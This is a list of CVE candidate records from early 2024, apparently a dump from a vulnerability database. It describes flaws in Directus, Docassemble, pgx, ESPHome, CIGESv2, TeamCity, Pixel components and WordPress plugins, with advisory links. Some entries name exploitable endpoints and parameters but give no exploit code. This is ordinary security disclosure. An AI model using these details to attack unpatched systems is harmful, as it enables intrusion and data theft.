CVE 2024 27296 Candidate Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 10.8.3, the exact Directus version number was being shipped in compiled JS bundles which are accessible without authentication. With this information a malicious attacker can trivially look for known vulnerabilities in Directus core or any of its shipped dependencies in that specific running version. The problem has been resolved in versions 10.8.3 and newer. MISC:https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0 | URL:https://github.com/directus/directus/commit/a5a1c26ac48795ed3212a4c51b9523588aff4fa0 | MISC:https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j | URL:https://github.com/directus/directus/security/advisories/GHSA-5mhg-wv8w-p59j Assigned (20240222)
CVE 2024 27295 Candidate Directus is a real-time API and App dashboard for managing SQL database content. The password reset mechanism of the Directus backend allows attackers to receive a password reset email of a victim user, specifically having it arrive at a similar email address as the victim with a one or more characters changed to use accents. This is due to the fact that by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive comparisons. This vulnerability is fixed in version 10.8.3. MISC:https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5 | URL:https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5 Assigned (20240222)
CVE 2024 27294 Candidate dp-golang is a Puppet module for Go installations. Prior to 1.2.7, dp-golang could install files — including the compiler binary — with the wrong ownership when Puppet was run as root and the installed package was On macOS: Go version 1.4.3 through 1.21rc3, inclusive, go1.4-bootstrap-20170518.tar.gz, or go1.4-bootstrap-20170531.tar.gz. The user and group specified in Puppet code were ignored for files within the archive. dp-puppet version 1.2.7 will recreate installations if the owner or group of any file or directory within that installation does not match the requested owner or group MISC:https://github.com/danielparks/puppet-golang/commit/1d0865b24071cb1c00d2fd8cb755d444e6e8f888 | URL:https://github.com/danielparks/puppet-golang/commit/1d0865b24071cb1c00d2fd8cb755d444e6e8f888 | MISC:https://github.com/danielparks/puppet-golang/commit/870724a7fef50208515da7bbfa9dfd5d6950e7f5 | URL:https://github.com/danielparks/puppet-golang/commit/870724a7fef50208515da7bbfa9dfd5d6950e7f5 | MISC:https://github.com/danielparks/puppet-golang/security/advisories/GHSA-8h8m-h98f-vv84 | URL:https://github.com/danielparks/puppet-golang/security/advisories/GHSA-8h8m-h98f-vv84 Assigned (20240222)
CVE 2024 27292 Candidate Docassemble is an expert system for guided interviews and document assembly. The vulnerability allows attackers to gain unauthorized access to information on the system through URL manipulation. It affects versions 1.4.53 to 1.4.96. The vulnerability has been patched in version 1.4.97 of the master branch. MISC:https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9 | URL:https://github.com/jhpyle/docassemble/commit/97f77dc486a26a22ba804765bfd7058aabd600c9 | MISC:https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv | URL:https://github.com/jhpyle/docassemble/security/advisories/GHSA-jq57-3w7p-vwvv Assigned (20240222)
CVE 2024 27291 Candidate Docassemble is an expert system for guided interviews and document assembly. Prior to 1.4.97, it is possible to create a URL that acts as an open redirect. The vulnerability has been patched in version 1.4.97 of the master branch. MISC:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa | URL:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa | MISC:https://github.com/jhpyle/docassemble/security/advisories/GHSA-7wxf-r2qv-9xwr | URL:https://github.com/jhpyle/docassemble/security/advisories/GHSA-7wxf-r2qv-9xwr Assigned (20240222)
CVE 2024 27290 Candidate Docassemble is an expert system for guided interviews and document assembly. Prior to 1.4.97, a user could type HTML into a field, including the field for the user's name, and then that HTML could be displayed on the screen as HTML. The vulnerability has been patched in version 1.4.97 of the master branch. MISC:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa | URL:https://github.com/jhpyle/docassemble/commit/4801ac7ff7c90df00ac09523077930cdb6dea2aa | MISC:https://github.com/jhpyle/docassemble/security/advisories/GHSA-pcfx-g2j2-f6f6 | URL:https://github.com/jhpyle/docassemble/security/advisories/GHSA-pcfx-g2j2-f6f6 Assigned (20240222)
CVE 2024 27289 Candidate pgx is a PostgreSQL driver and toolkit for Go. Prior to version 4.18.2, SQL injection can occur when all of the following conditions are met: the non-default simple protocol is used; a placeholder for a numeric value must be immediately preceded by a minus; there must be a second placeholder for a string value after the first placeholder; both must be on the same line; and both parameter values must be user-controlled. The problem is resolved in v4.18.2. As a workaround, do not use the simple protocol or do not place a minus directly before a placeholder. MISC:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df | URL:https://github.com/jackc/pgx/commit/f94eb0e2f96782042c96801b5ac448f44f0a81df | MISC:https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p | URL:https://github.com/jackc/pgx/security/advisories/GHSA-m7wr-2xf7-cm9p Assigned (20240222)
CVE 2024 27288 Candidate 1Panel is an open source Linux server operation and maintenance management panel. Prior to version 1.10.1-lts, users can use Burp to obtain unauthorized access to the console page. The vulnerability has been fixed in v1.10.1-lts. There are no known workarounds. MISC:https://github.com/1Panel-dev/1Panel/releases/tag/v1.10.1-lts | URL:https://github.com/1Panel-dev/1Panel/releases/tag/v1.10.1-lts | MISC:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-26w3-q4j8-4xjp | URL:https://github.com/1Panel-dev/1Panel/security/advisories/GHSA-26w3-q4j8-4xjp Assigned (20240222)
CVE 2024 27287 Candidate ESPHome is a system to control your ESP8266/ESP32 for Home Automation systems. Starting in version 2023.12.9 and prior to version 2024.2.2, editing the configuration file API in dashboard component of ESPHome version 2023.12.9 (command line installation and Home Assistant add-on) serves unsanitized data with `Content-Type: text/html; charset=UTF-8`, allowing a remote authenticated user to inject arbitrary web script and exfiltrate session cookies via Cross-Site scripting. It is possible for a malicious authenticated user to inject arbitrary Javascript in configuration files using a POST request to the /edit endpoint, the configuration parameter allows to specify the file to write. To trigger the XSS vulnerability, the victim must visit the page` /edit?configuration=[xss file]`. Abusing this vulnerability a malicious actor could perform operations on the dashboard on the behalf of a logged user, access sensitive information, create, edit and delete configuration files and flash firmware on managed boards. In addition to this, cookies are not correctly secured, allowing the exfiltration of session cookie values. Version 2024.2.2 contains a patch for this issue. MISC:https://github.com/esphome/esphome/commit/37d2b3c7977a4ccbec59726ca7549cb776661455 | URL:https://github.com/esphome/esphome/commit/37d2b3c7977a4ccbec59726ca7549cb776661455 | MISC:https://github.com/esphome/esphome/security/advisories/GHSA-9p43-hj5j-96h5 | URL:https://github.com/esphome/esphome/security/advisories/GHSA-9p43-hj5j-96h5 Assigned (20240222)
CVE 2024 27286 Candidate Zulip is an open-source team collaboration. When a user moves a Zulip message, they have the option to move all messages in the topic, move only subsequent messages as well, or move just a single message. If the user chose to just move one message, and was moving it from a public stream to a private stream, Zulip would successfully move the message, -- but active users who did not have access to the private stream, but whose client had already received the message, would continue to see the message in the public stream until they reloaded their client. Additionally, Zulip did not remove view permissions on the message from recently-active users, allowing the message to show up in the "All messages" view or in search results, but not in "Inbox" or "Recent conversations" views. While the bug has been present since moving messages between streams was first introduced in version 3.0, this option became much more common starting in Zulip 8.0, when the default option in the picker for moving the very last message in a conversation was changed. This issue is fixed in Zulip Server 8.3. No known workarounds are available. MISC:https://github.com/zulip/zulip/commit/3db1733310ddd944c2e690ba673232345c928eec | URL:https://github.com/zulip/zulip/commit/3db1733310ddd944c2e690ba673232345c928eec | MISC:https://github.com/zulip/zulip/security/advisories/GHSA-478x-rfqr-w4jf | URL:https://github.com/zulip/zulip/security/advisories/GHSA-478x-rfqr-w4jf Assigned (20240222)
CVE 2024 27285 Candidate YARD is a Ruby Documentation tool. The "frames.html" file within the Yard Doc's generated documentation is vulnerable to Cross-Site Scripting (XSS) attacks due to inadequate sanitization of user input within the JavaScript segment of the "frames.erb" template file. This vulnerability is fixed in 0.9.36. FEDORA:FEDORA-2024-3744975c4b | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MR3Z2E2UIZZ7YOR7R645EVSBGWMB2RGA/ | MISC:https://github.com/lsegal/yard/commit/1fcb2d8b316caf8779cfdcf910715e9ab583f0aa | URL:https://github.com/lsegal/yard/commit/1fcb2d8b316caf8779cfdcf910715e9ab583f0aa | MISC:https://github.com/lsegal/yard/commit/2069e2bf08293bda2fcc78f7d0698af6354054be | URL:https://github.com/lsegal/yard/commit/2069e2bf08293bda2fcc78f7d0698af6354054be | MISC:https://github.com/lsegal/yard/pull/1538 | URL:https://github.com/lsegal/yard/pull/1538 | MISC:https://github.com/lsegal/yard/security/advisories/GHSA-8mq4-9jjh-9xrc | URL:https://github.com/lsegal/yard/security/advisories/GHSA-8mq4-9jjh-9xrc | MISC:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/yard/CVE-2024-27285.yml | URL:https://github.com/rubysec/ruby-advisory-db/blob/master/gems/yard/CVE-2024-27285.yml | MLIST:[debian-lts-announce] 20240306 [SECURITY] [DLA 3753-1] yard security update | URL:https://lists.debian.org/debian-lts-announce/2024/03/msg00006.html Assigned (20240222)
CVE 2024 27284 Candidate cassandra-rs is a Cassandra (CQL) driver for Rust. Code that attempts to use an item (e.g., a row) returned by an iterator after the iterator has advanced to the next item will be accessing freed memory and experience undefined behaviour. The problem has been fixed in version 3.0.0. MISC:https://github.com/Metaswitch/cassandra-rs/commit/ae054dc8044eac9c2c7ae2b1ab154b53ca7f8df7 | URL:https://github.com/Metaswitch/cassandra-rs/commit/ae054dc8044eac9c2c7ae2b1ab154b53ca7f8df7 | MISC:https://github.com/Metaswitch/cassandra-rs/security/advisories/GHSA-x9xc-63hg-vcfq | URL:https://github.com/Metaswitch/cassandra-rs/security/advisories/GHSA-x9xc-63hg-vcfq Assigned (20240222)
CVE 2024 27283 Candidate A vulnerability was discovered in Veritas eDiscovery Platform before 10.2.5. The application administrator can upload potentially malicious files to arbitrary locations on the server on which the application is installed. MISC:https://www.veritas.com/support/en_US/security/VTS23-020 Assigned (20240222)
CVE 2024 2728 Candidate Information exposure vulnerability in the CIGESv2 system. This vulnerability could allow a local attacker to intercept traffic due to the lack of proper implementation of the TLS protocol. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system Assigned (20240320)
CVE 2024 27279 Candidate Directory traversal vulnerability exists in a-blog cms Ver.3.1.x series Ver.3.1.9 and earlier, Ver.3.0.x series Ver.3.0.30 and earlier, Ver.2.11.x series Ver.2.11.59 and earlier, Ver.2.10.x series Ver.2.10.51 and earlier, and Ver.2.9 and earlier versions. If this vulnerability is exploited, a user with editor or higher privilege who can login to the product may obtain arbitrary files on the server including password files. MISC:https://developer.a-blogcms.jp/blog/news/JVN-48443978.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-48443978.html | MISC:https://jvn.jp/en/jp/JVN48443978/ | URL:https://jvn.jp/en/jp/JVN48443978/ Assigned (20240222)
CVE 2024 27278 Candidate OpenPNE Plugin "opTimelinePlugin" 1.2.11 and earlier contains a cross-site scripting vulnerability. On the site which uses the affected product, when a user configures the profile with some malicious contents, an arbitrary script may be executed on the web browsers of other users. MISC:http://www.openpne.jp/archives/13458/ | URL:http://www.openpne.jp/archives/13458/ | MISC:https://jvn.jp/en/jp/JVN78084105/ | URL:https://jvn.jp/en/jp/JVN78084105/ Assigned (20240222)
CVE 2024 27277 Candidate The private key for the IBM Storage Protect Plus Server 10.1.0 through 10.1.16 certificate can be disclosed, undermining the security of the certificate. IBM X-Force ID: 285205. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/285205 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/285205 | MISC:https://www.ibm.com/support/pages/node/7144861 | URL:https://www.ibm.com/support/pages/node/7144861 Assigned (20240222)
CVE 2024 2727 Candidate HTML injection vulnerability affecting the CIGESv2 system, which allows an attacker to inject arbitrary code and modify elements of the website and email confirmation message. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system Assigned (20240320)
CVE 2024 27266 Candidate IBM Maximo Application Suite 7.6.1.3 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 284566. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/284566 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/284566 | MISC:https://www.ibm.com/support/pages/node/7141270 | URL:https://www.ibm.com/support/pages/node/7141270 Assigned (20240222)
CVE 2024 27265 Candidate IBM Integration Bus for z/OS 10.1 through 10.1.0.3 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 284564. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/284564 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/284564 | MISC:https://www.ibm.com/support/pages/node/7140678 | URL:https://www.ibm.com/support/pages/node/7140678 Assigned (20240222)
CVE 2024 2726 Candidate Stored Cross-Site Scripting (Stored-XSS) vulnerability affecting the CIGESv2 system, allowing an attacker to execute and store malicious javascript code in the application form without prior registration. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system Assigned (20240320)
CVE 2024 27255 Candidate IBM MQ Operator 2.0.0 LTS, 2.0.18 LTS, 3.0.0 CD, 3.0.1 CD, 2.4.0 through 2.4.7, 2.3.0 through 2.3.3, 2.2.0 through 2.2.2, and 2.3.0 through 2.3.3 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 283905. MISC:https://exchange.xforce.ibmcloud.com/vulnerabilities/283905 | URL:https://exchange.xforce.ibmcloud.com/vulnerabilities/283905 | MISC:https://www.ibm.com/support/pages/node/7126571 | URL:https://www.ibm.com/support/pages/node/7126571 Assigned (20240222)
CVE 2024 2725 Candidate Information exposure vulnerability in the CIGESv2 system. A remote attacker might be able to access /vendor/composer/installed.json and retrieve all installed packages used by the application. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system Assigned (20240320)
CVE 2024 2724 Candidate SQL injection vulnerability in the CIGESv2 system, through /ajaxServiciosAtencion.php, in the 'idServicio' parameter. The exploitation of this vulnerability could allow a remote user to retrieve all data stored in the database by sending a specially crafted SQL query. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system Assigned (20240320)
CVE 2024 27237 Candidate In wipe_ns_memory of nsmemwipe.c, there is a possible incorrect size calculation due to a logic error in the code. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27236 Candidate In aoc_unlocked_ioctl of aoc.c, there is a possible memory corruption due to type confusion. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27235 Candidate In plugin_extern_func of , there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27234 Candidate In fvp_set_target of fvp.c, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27233 Candidate In ppcfw_init_secpolicy of ppcfw.c, there is a possible permission bypass due to uninitialized data. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27230 Candidate In ProtocolPsKeepAliveStatusAdapter::getCode() of protocolpsadapter.cpp, there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with baseband firmware compromise required. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 2723 Candidate SQL injection vulnerability in the CIGESv2 system, through /ajaxSubServicios.php, in the 'idServicio' parameter. The exploitation of this vulnerability could allow a remote user to retrieve all data stored in the database by sending a specially crafted SQL query. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system Assigned (20240320)
CVE 2024 27229 Candidate In ss_SendCallBarringPwdRequiredIndMsg of ss_CallBarring.c, there is a possible null pointer deref due to a missing null check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27228 Candidate there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27227 Candidate A malicious DNS response can trigger a number of OOB reads, writes, and other memory issues MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27226 Candidate In tmu_config_gov_params of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27225 Candidate In sendHciCommand of bluetooth_hci.cc, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27224 Candidate In strncpy of strncpy.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27223 Candidate In EUTRAN_LCS_DecodeFacilityInformationElement of LPP_LcsManagement.c, there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure after authenticating the cell connection with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27222 Candidate In onSkipButtonClick of FaceEnrollFoldPage.java, there is a possible way to access the file the app cannot access due to Intent Redirect GRANT_URI_PERMISSIONS Attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27221 Candidate In update_policy_data of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27220 Candidate In lpm_req_handler of , there is a possible out of bounds memory access due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 2722 Candidate SQL injection vulnerability in the CIGESv2 system, through /ajaxConfigTotem.php, in the 'id' parameter. The exploitation of this vulnerability could allow a remote user to retrieve all data stored in the database by sending a specially crafted SQL query. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-cigesv2-system Assigned (20240320)
CVE 2024 27219 Candidate In tmu_set_pi of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27218 Candidate In update_freq_data of , there is a possible out of bounds read due to a missing bounds check. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27215 Candidate ** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2024-1709. Reason: This candidate is a duplicate of CVE-2024-1709. Notes: All CVE users should reference CVE-2024-1709 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. Assigned (20240221)
CVE 2024 27213 Candidate In BroadcastSystemMessage of servicemgr.cpp, there is a possible Remote Code Execution due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27212 Candidate In init_data of , there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27211 Candidate In AtiHandleAPOMsgType of ati_Main.c, there is a possible OOB write due to a missing null check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27210 Candidate In policy_check of fvp.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 2721 Candidate Deserialization of Untrusted Data vulnerability in Social Media Share Buttons By Sygnoos Social Media Share Buttons.This issue affects Social Media Share Buttons: from n/a through 2.1.0. MISC:https://patchstack.com/database/vulnerability/social-media-builder/wordpress-social-media-share-buttons-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/social-media-builder/wordpress-social-media-share-buttons-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve Assigned (20240320)
CVE 2024 27209 Candidate there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27208 Candidate there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27207 Candidate Exported broadcast receivers allowing malicious apps to bypass broadcast protection. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27206 Candidate there is a possible out of bounds read due to a missing bounds check. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27205 Candidate there is a possible memory corruption due to a use after free. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 27204 Candidate In tmu_set_gov_active of tmu.c, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. MISC:https://source.android.com/security/bulletin/pixel/2024-03-01 | URL:https://source.android.com/security/bulletin/pixel/2024-03-01 Assigned (20240221)
CVE 2024 2720 Candidate A vulnerability classified as problematic was found in Campcodes Complete Online DJ Booking System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/aboutus.php. The manipulation of the argument pagetitle leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257473 was assigned to this vulnerability. MISC:VDB-257473 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257473 | MISC:VDB-257473 | Campcodes Complete Online DJ Booking System aboutus.php cross site scripting | URL:https://vuldb.com/?id.257473 | MISC:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%209.pdf | URL:https://github.com/E1CHO/cve_hub/blob/main/Complete%20Online%20DJ%20Booking%20System/Complete%20Online%20DJ%20Booking%20System%20-%20vuln%209.pdf Assigned (20240320)
CVE 2024 27199 Candidate In JetBrains TeamCity before 2023.11.4 path traversal allowing to perform limited admin actions was possible MISC:https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive | MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240221)
CVE 2024 27198 Candidate In JetBrains TeamCity before 2023.11.4 authentication bypass allowing to perform admin actions was possible MISC:https://www.darkreading.com/cyberattacks-data-breaches/jetbrains-teamcity-mass-exploitation-underway-rogue-accounts-thrive | MISC:https://www.jetbrains.com/privacy-security/issues-fixed/ | URL:https://www.jetbrains.com/privacy-security/issues-fixed/ Assigned (20240221)
CVE 2024 27197 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Bee BeePress allows Stored XSS.This issue affects BeePress: from n/a through 6.9.8. MISC:https://patchstack.com/database/vulnerability/beepress/wordpress-beepress-plugin-6-9-8-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/beepress/wordpress-beepress-plugin-6-9-8-csrf-to-stored-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240221)
CVE 2024 27196 Candidate Cross Site Scripting (XSS) vulnerability in Joel Starnes postMash – custom post order allows Reflected XSS.This issue affects postMash – custom post order: from n/a through 1.2.0. MISC:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/postmash/wordpress-postmash-custom-post-order-plugin-1-2-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240221)
CVE 2024 27195 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Sandi Verdev Watermark RELOADED allows Stored XSS.This issue affects Watermark RELOADED: from n/a through 1.3.5. MISC:https://patchstack.com/database/vulnerability/watermark-reloaded/wordpress-watermark-reloaded-plugin-1-3-5-csrf-to-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/watermark-reloaded/wordpress-watermark-reloaded-plugin-1-3-5-csrf-to-xss-vulnerability?_s_id=cve Assigned (20240221)
CVE 2024 27194 Candidate Cross-Site Request Forgery (CSRF) vulnerability in Andrei Ivasiuc Fontific | Google Fonts allows Stored XSS.This issue affects Fontific | Google Fonts: from n/a through 0.1.6. MISC:https://patchstack.com/database/vulnerability/fontific/wordpress-fontific-plugin-0-1-6-csrf-to-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/fontific/wordpress-fontific-plugin-0-1-6-csrf-to-xss-vulnerability?_s_id=cve Assigned (20240221)
CVE 2024 27193 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in PayU PayU India allows Reflected XSS.This issue affects PayU India: from n/a through 3.8.2. MISC:https://patchstack.com/database/vulnerability/payu-india/wordpress-payu-india-plugin-3-8-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/payu-india/wordpress-payu-india-plugin-3-8-2-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240221)
